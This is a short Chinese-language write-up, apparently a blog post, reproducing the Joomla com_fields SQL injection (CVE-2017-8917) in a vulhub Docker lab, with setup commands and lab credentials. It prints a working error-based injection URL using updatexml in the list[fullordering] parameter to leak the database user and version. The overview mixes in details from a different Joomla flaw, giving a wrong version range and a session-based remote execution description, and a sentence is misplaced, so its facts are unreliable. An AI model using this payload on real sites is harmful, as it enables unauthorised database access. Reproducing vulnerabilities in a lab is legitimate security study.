漏洞概述
信息填对后,会显示安装成功com_fields组件出现漏洞,com_fields组件是在3.7版本添加的,如果你使用此版本,将受到影响,并应尽快更新。这个组件可以公开访问,意味着任何能访问你站点的用户都可以发起攻击
漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。
影响范围:
Joomla 3.0.0-3.4.6
复现过程
这里使用3.7.0版本
使用vulhub
进入/joomla/CVE-2017-8917目录,启动docker
docker-compose build
docker-compose up -d
启动后访问 http://your-ip:8080,即可看到Joomla的安装界面,当前环境的数据库信息为:
- 数据库地址:mysql:3306
- 用户:root
- 密码:root
- 数据库名:joomla
填入上述信息,正常安装即可。
信息填对后,会显示安装成功
删除installation目录
重新访问后显示如下
payload注入:
192.168.xxx.xxx:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
显示如下:
也可输入version()、localhost()
声明
严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !